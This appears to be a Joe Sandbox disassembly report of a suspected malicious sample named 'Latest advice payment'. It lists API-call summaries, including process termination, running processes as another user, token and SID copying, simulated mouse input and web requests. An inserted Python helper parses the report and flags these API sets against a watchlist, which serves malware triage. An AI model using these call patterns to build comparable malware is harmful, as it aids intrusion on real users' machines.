                                                            • Opcode Fuzzy Hash: edfacf0dd637b63e679ea2bd284fcf2a4f81808142ba943426df687a43a59520
                                                            • Instruction Fuzzy Hash: B9418374600280AFEB29CF25C499B967FE1FF45311F1841B9F9C98FAA2C731A856CB51
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,005D4E41,?,?,00000000,00000001), ref: 005D70AC
                                                              • Part of subcall function 005D39A0: GetWindowRect.USER32(?,?), ref: 005D39B3
                                                            • GetDesktopWindow.USER32 ref: 005D70D6
                                                            • GetWindowRect.USER32(00000000), ref: 005D70DD
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 005D710F
                                                              • Part of subcall function 005C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005C52BC
                                                            • GetCursorPos.USER32(?), ref: 005D713B
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005D7199
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: 877dd835c048372114deffc38c194c52f3136e4693034e11b36bd252fb828ba8
                                                            • Instruction ID: ec909b833668afd76fc0cc3ea3129079ddcefb526ed1ac4aca107eb63da9a302
                                                            • Opcode Fuzzy Hash: 877dd835c048372114deffc38c194c52f3136e4693034e11b36bd252fb828ba8
                                                            • Instruction Fuzzy Hash: 2E31D47250534AAFD724DF54C849F5BBBEAFF98314F00091AF5859B291DB30EA09CB92
                                                            APIs
                                                              • Part of subcall function 005B80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005B80C0
                                                              • Part of subcall function 005B80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005B80CA
                                                              • Part of subcall function 005B80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005B80D9
                                                              • Part of subcall function 005B80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005B80E0
                                                              • Part of subcall function 005B80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005B80F6
                                                            • GetLengthSid.ADVAPI32(?,00000000,005B842F), ref: 005B88CA
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005B88D6
                                                            • HeapAlloc.KERNEL32(00000000), ref: 005B88DD
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 005B88F6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,005B842F), ref: 005B890A
                                                            • HeapFree.KERNEL32(00000000), ref: 005B8911
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: fe26bc9fec9c3cdae5fecc201c07918a29058fe64dc85a9432075f35b360cc23
                                                            • Instruction ID: 469f50ad5b037b3a78b7393c82a5cb491065e575352d37df9173be64ca51b153
                                                            • Opcode Fuzzy Hash: fe26bc9fec9c3cdae5fecc201c07918a29058fe64dc85a9432075f35b360cc23
                                                            • Instruction Fuzzy Hash: 86119D32501209FBDB199BA4DC49BFE7B6CFB85311F108428F88597150CB32AA04DB60
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005B85E2
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 005B85E9
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005B85F8
                                                            • CloseHandle.KERNEL32(00000004), ref: 005B8603
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 005B8632
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 005B8646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: 70a000ec12ff7c9b6343da4f306fc6c73bdc7bc63db79ff332be19360c7f3199
                                                            • Instruction ID: 1f0d38be641f291a2134d74dc7805379afbb35403a2bcc80cf00e3068b1297b0
                                                            • Opcode Fuzzy Hash: 70a000ec12ff7c9b6343da4f306fc6c73bdc7bc63db79ff332be19360c7f3199
                                                            • Instruction Fuzzy Hash: 60113872501249ABDF118FA4DD49BEA7BA9FB48304F044064FE45A61A0CA719E64EB60
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 005BB7B5
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 005BB7C6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005BB7CD
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 005BB7D5
                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 005BB7EC
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 005BB7FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 0f76632f44a172c2ea201d5a3eb72b665a9506f28f422f3931d55b534c10569d
                                                            • Instruction ID: 7476d98b8a9b36be5aa2ed2a95e2a88fd8fd0c8cbbb12d58132c23d2f676408d
                                                            • Opcode Fuzzy Hash: 0f76632f44a172c2ea201d5a3eb72b665a9506f28f422f3931d55b534c10569d
                                                            • Instruction Fuzzy Hash: D60188B5E00249BBEB105BA69C89A5EBFB8EB58311F004075FA04AB291DA709D00CF51
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00580193
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 0058019B
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 005801A6
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 005801B1
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 005801B9
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 005801C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 704755af836baa9ce2189d76ec225742900c418ca7be20069d66ce1bab452e12
                                                            • Instruction ID: c2eee57039f780f6603e6a35d65219a9eafb9b989c3aa479e52185376e8a1900
                                                            • Opcode Fuzzy Hash: 704755af836baa9ce2189d76ec225742900c418ca7be20069d66ce1bab452e12
                                                            • Instruction Fuzzy Hash: 1B016CB09017597DE3008F5A8C85B52FFA8FF19354F00415BA15C4B941C7F5A868CBE5
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005C53F9
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 005C540F
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 005C541E
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005C542D
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005C5437
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005C543E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: 28ca722f35b013fdbf6b3ec9aeb61c50b070dd059d2b14863190cbfa212661b2
                                                            • Instruction ID: ccadf5084e39fc9f0de25d4f9a2c1ee6dd33029b11c5b100df95b62ade962f29
                                                            • Opcode Fuzzy Hash: 28ca722f35b013fdbf6b3ec9aeb61c50b070dd059d2b14863190cbfa212661b2
                                                            • Instruction Fuzzy Hash: C7F06232140198BBD7295B92DC4DEAB7B7CEBD6B11F000169F944D50909BA01A05D7B5
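Triage helper, added here as an example; it is not Joe Sandbox code and not code from the sample. The function summaries in this report follow a fixed shape (an "APIs" header, one bullet per call in the form "Name.MODULE(args), ref: address", subcall bullets prefixed with "Part of subcall function", then the Similarity fields), so they can be parsed and searched rather than read one at a time. The block below parses that shape, decodes hex arguments so that, for instance, the function above can be read as PostMessageW(WM_CLOSE = 0x10), SendMessageTimeoutW with SMTO_ABORTIFHUNG = 0x2 and a 0x1F4 = 500 ms timeout, then OpenProcess with PROCESS_ALL_ACCESS = 0x1F0FFF followed by TerminateProcess, and flags functions whose API set matches a watchlist. The watchlist tags and the abridged sample text are constructed for this example; the sample lines are copied from three blocks in this report.

```python
"""Parse Joe Sandbox IDA-plugin function summaries and flag API sets worth a closer look.
Added example; the watchlist tags are this editor's choice, not Joe Sandbox categories."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# One API bullet, in the three shapes the report uses:
#   • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C22A3
#   • _memset.LIBCMT ref: 005C2258                                   (no argument list)
#   • Part of subcall function 005B80A9: GetTokenInformation.ADVAPI32(...), ref: 005B80C0
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# Any other bullet, e.g. '• API String ID: 839392675-0' or '• Associated: ...'
FIELD_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple[str, ...]          # raw plugin values; '?' means it could not resolve the argument
    ref: str                       # address of the call site
    subcall_of: str | None = None  # set when the call lives in a callee, not this function


@dataclass
class FunctionSummary:
    calls: list[ApiCall] = field(default_factory=list)
    fields: dict[str, list[str]] = field(default_factory=dict)  # repeated keys keep every value

    @property
    def api_string_id(self) -> str:
        return self.fields.get("API String ID", ["?"])[0]

    def api_names(self, include_subcalls: bool = True) -> set[str]:
        return {c.name for c in self.calls if include_subcalls or c.subcall_of is None}


def parse_blocks(text: str) -> list[FunctionSummary]:
    """Split report text into one FunctionSummary per 'APIs' block."""
    blocks: list[FunctionSummary] = []
    current: FunctionSummary | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionSummary()
            blocks.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue  # 'Memory Dump Source', 'Similarity', ... carry no data of their own
        m = API_LINE.match(line)
        if m:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = FIELD_LINE.match(line)
        if m:
            current.fields.setdefault(m["key"], []).append(m["value"].strip())
    return blocks


def hex_arg(call: ApiCall, index: int) -> int | None:
    """Decode argument `index` as the hex constant the plugin printed; None if absent or '?'."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


# Hand-picked for triage of this report; every API in a set must appear (subcalls included).
WATCHLIST: dict[str, frozenset[str]] = {
    "process-termination": frozenset({"OpenProcess", "TerminateProcess"}),
    "run-as-other-user": frozenset({"CreateProcessWithLogonW"}),
    "token-sid-copy": frozenset({"GetTokenInformation", "CopySid"}),
}


def flag_functions(blocks: list[FunctionSummary], watchlist=WATCHLIST) -> dict[str, list[str]]:
    """Map each watchlist tag to the API String IDs of the functions that match it."""
    hits: dict[str, list[str]] = {}
    for b in blocks:
        names = b.api_names()
        for tag, required in watchlist.items():
            if required <= names:
                hits.setdefault(tag, []).append(b.api_string_id)
    return hits


# Constructed input: an abridged copy of three blocks from this report.
SAMPLE = """\
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005C53F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 005C540F
• GetWindowThreadProcessId.USER32(?,?), ref: 005C541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 005C542D
• TerminateProcess.KERNEL32(00000000,00000000), ref: 005C5437
Similarity
• API String ID: 839392675-0
APIs
  • Part of subcall function 005B80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005B80C0
• GetLengthSid.ADVAPI32(?,00000000,005B842F), ref: 005B88CA
• CopySid.ADVAPI32(00000000,00000000,?), ref: 005B88F6
Similarity
• API String ID: 3008561057-0
APIs
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005B85F8
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 005B8632
Similarity
• API String ID: 1413079979-0
"""
```

Run it against the full report text instead of SAMPLE to get every matching function's API String ID; the ID is stable across reports, so a hit list can be compared with other samples from the same family. Matching on API String ID rather than on the function address is deliberate: the address changes with every rebuild of the dropper, the ID does not.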
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 005C7243
                                                            • EnterCriticalSection.KERNEL32(?,?,00570EE4,?,?), ref: 005C7254
                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00570EE4,?,?), ref: 005C7261
                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00570EE4,?,?), ref: 005C726E
                                                              • Part of subcall function 005C6C35: CloseHandle.KERNEL32(00000000,?,005C727B,?,00570EE4,?,?), ref: 005C6C3F
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 005C7281
                                                            • LeaveCriticalSection.KERNEL32(?,?,00570EE4,?,?), ref: 005C7288
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: d0d999ae9e7d37bc776ec4ebb1ea325ec89f5aaab4630fc4d3f0f035d3df1708
                                                            • Instruction ID: 0ba576c35f0c0369f4bbbfd9afd7b447c62c58d7c3f0474dd6171742cc3d9ada
                                                            • Opcode Fuzzy Hash: d0d999ae9e7d37bc776ec4ebb1ea325ec89f5aaab4630fc4d3f0f035d3df1708
                                                            • Instruction Fuzzy Hash: 8CF0BE3F440202EFD7191B64EC8CEEA3B29FF58302B010135F243980A0CF761904DB50
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005B899D
                                                            • UnloadUserProfile.USERENV(?,?), ref: 005B89A9
                                                            • CloseHandle.KERNEL32(?), ref: 005B89B2
                                                            • CloseHandle.KERNEL32(?), ref: 005B89BA
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 005B89C3
                                                            • HeapFree.KERNEL32(00000000), ref: 005B89CA
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: cb632c4d436449ea8575e54f2fa80187ad5822d7acadf0459142e78f67208627
                                                            • Instruction ID: 00f7102f7a74fc8eb7de05ac165f33e727ab7ec0f68cf12ff8ef3789995534db
                                                            • Opcode Fuzzy Hash: cb632c4d436449ea8575e54f2fa80187ad5822d7acadf0459142e78f67208627
                                                            • Instruction Fuzzy Hash: F0E0C236004045FBDA091FE1EC4C90ABB69FBA9322B108630F299890B0CF329468EB90
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,005F2C7C,?), ref: 005B76EA
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,005F2C7C,?), ref: 005B7702
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,005EFB80,000000FF,?,00000000,00000800,00000000,?,005F2C7C,?), ref: 005B7727
                                                            • _memcmp.LIBCMT ref: 005B7748
                                                            Strings
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID: ,,_
                                                            • API String ID: 314563124-217268573
                                                            • Opcode ID: 0d2dcccb7dafc31cf6cf262f9ce2596a48d008bb90fa68e5a9bf5be4e9fd0f96
                                                            • Instruction ID: 7f999b20c627a42c2f16132f302f9ae54b8f06ad8fd846225b87e40e311bc4f4
                                                            • Opcode Fuzzy Hash: 0d2dcccb7dafc31cf6cf262f9ce2596a48d008bb90fa68e5a9bf5be4e9fd0f96
                                                            • Instruction Fuzzy Hash: AC81EE75A00109EFCB04DFA4C984EEEBBB9FF89315F204558F516AB250DB71AE06CB60
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 005D8613
                                                            • CharUpperBuffW.USER32(?,?), ref: 005D8722
                                                            • VariantClear.OLEAUT32(?), ref: 005D889A
                                                              • Part of subcall function 005C7562: VariantInit.OLEAUT32(00000000), ref: 005C75A2
                                                              • Part of subcall function 005C7562: VariantCopy.OLEAUT32(00000000,?), ref: 005C75AB
                                                              • Part of subcall function 005C7562: VariantClear.OLEAUT32(00000000), ref: 005C75B7
                                                            Strings
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 551925513a32ee08fcd89a76c5df7fa1fe4b10a7b5b6ba5003b6f7c9344ca929
                                                            • Instruction ID: 6a6f6701b14fe3fddf4a2851f4e5bca2ba5290e4caa8c3d7ece0ac2fc4d1dfa7
                                                            • Opcode Fuzzy Hash: 551925513a32ee08fcd89a76c5df7fa1fe4b10a7b5b6ba5003b6f7c9344ca929
                                                            • Instruction Fuzzy Hash: 73915A756043029FC710DF28C48496ABBE8FFD9714F14896EF89A8B361DB31E945CB92
                                                            APIs
                                                              • Part of subcall function 0057FC86: _wcscpy.LIBCMT ref: 0057FCA9
                                                            • _memset.LIBCMT ref: 005C2B87
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005C2BB6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005C2C69
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 005C2C97
                                                            Strings
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: e78f8f247ef4303bc584acadd219c4fca2cd80aab1bea2903239189ce49069a3
                                                            • Instruction ID: dce2fc359c927546cb184ad27dd13d0b9722939ee05c05daaa3daccbdfac6c8f
                                                            • Opcode Fuzzy Hash: e78f8f247ef4303bc584acadd219c4fca2cd80aab1bea2903239189ce49069a3
                                                            • Instruction Fuzzy Hash: 89519D71608301AED725AEA8D849F6FBFE8BF99314F040A2DF895D7190DB70CD449B52
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _memmove$_free
                                                            • String ID: 3cW$_W
                                                            • API String ID: 2620147621-1067530677
                                                            • Opcode ID: 0c2207383ae2564e470a92d7258247c7ea9859d59450dcdc497e4bba15dc7b5e
                                                            • Instruction ID: 5cc37cd2d85dc156a069a7ed4b694cbd38582a3adeec11b61070bcd8f150ff3a
                                                            • Opcode Fuzzy Hash: 0c2207383ae2564e470a92d7258247c7ea9859d59450dcdc497e4bba15dc7b5e
                                                            • Instruction Fuzzy Hash: E8516A716047418FDB29DF28D484B6FBBE5BFC5320F48882DE98997251EB31E905DB42
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: 3cW$ERCP
                                                            • API String ID: 2532777613-2184803303
                                                            • Opcode ID: 03584a369c5ccaf64a9c4141a51378a25f17b94a9b3e91a20a103e2c5614676a
                                                            • Instruction ID: 0330c704a34ef6a9ebec6f9fe5f6dbf00064a2a0814d723cf45db273d66ca25c
                                                            • Opcode Fuzzy Hash: 03584a369c5ccaf64a9c4141a51378a25f17b94a9b3e91a20a103e2c5614676a
                                                            • Instruction Fuzzy Hash: 06519C70900B06DFDB24CF65D885BEBBFE4BF44304F20896AE84AD7281E770AA44DB50
                                                            APIs
                                                            • _memset.LIBCMT ref: 005C27C0
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 005C27DC
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 005C2822
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00625890,00000000), ref: 005C286B
                                                            Strings
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: 3065321b97c7978b8d25183e2dce7f1f75749bc94977c221a4f8379067da1fad
                                                            • Instruction ID: 218ba06982d91077b4cdda6f3e22bef36b13c2bf3867e891abdcd1b20ba9495d
                                                            • Opcode Fuzzy Hash: 3065321b97c7978b8d25183e2dce7f1f75749bc94977c221a4f8379067da1fad
                                                            • Instruction Fuzzy Hash: 06418E702043429FDB24DF64D884F5ABFE4FF85314F044A2DF9A597291DB70A805CB62
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 005DD7C5
                                                              • Part of subcall function 0056784B: _memmove.LIBCMT ref: 00567899
                                                            Strings
                                                            Similarity
                                                            • API ID: BuffCharLower_memmove
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 3425801089-567219261
                                                            • Opcode ID: 866d97b95283eb78781e537d9fbb1b19d0ab6b270eb332e254a5240221ca0839
                                                            • Instruction ID: 975443aa56ae0382c1fb5e64d6d2b05fcc24d7ba3d585fb06bb3f759dda7e85c
                                                            • Opcode Fuzzy Hash: 866d97b95283eb78781e537d9fbb1b19d0ab6b270eb332e254a5240221ca0839
                                                            • Instruction Fuzzy Hash: F231D47190421AABCF10EF58CC559EEBBB5FF54320B00862AE865A73D1DB31AD05CB90
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 005BAABC
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005B8F14
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 005B8F27
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 005B8F57
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 365058703-1403004172
                                                            • Opcode ID: 8b63a7b837b3d73c18771e72d41614fd62d890c9893f7e6fd824b3860f6fb270
                                                            • Instruction ID: 9d2c1cb9e6d9561124709f4387766a931810709f0985747a3b78a188aa3b6135
                                                            • Opcode Fuzzy Hash: 8b63a7b837b3d73c18771e72d41614fd62d890c9893f7e6fd824b3860f6fb270
                                                            • Instruction Fuzzy Hash: 5B21F271A00109BADB14ABA0DC89CFFBF7DEF95320B044529F861A71E1DE355949D620
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 005D184C
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005D1872
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 005D18A2
                                                            • InternetCloseHandle.WININET(00000000), ref: 005D18E9
                                                              • Part of subcall function 005D2483: GetLastError.KERNEL32(?,?,005D1817,00000000,00000000,00000001), ref: 005D2498
                                                              • Part of subcall function 005D2483: SetEvent.KERNEL32(?,?,005D1817,00000000,00000000,00000001), ref: 005D24AD
                                                            Strings
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: aadcbf25b47da2d0b44a5cda18cddd8e3f2aa247c4b2b01bef80ca511fca450c
                                                            • Instruction ID: a730181bb905de0b513045c961c9930124fc78c595ea62708cc0903ffe3dbc8d
                                                            • Opcode Fuzzy Hash: aadcbf25b47da2d0b44a5cda18cddd8e3f2aa247c4b2b01bef80ca511fca450c
                                                            • Instruction Fuzzy Hash: 4321B0B1500608BFEB21DB68DC85EBB7BEDFB88744F10412BF805A6340EA319D0467A5
                                                            APIs
                                                              • Part of subcall function 00561D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00561D73
                                                              • Part of subcall function 00561D35: GetStockObject.GDI32(00000011), ref: 00561D87
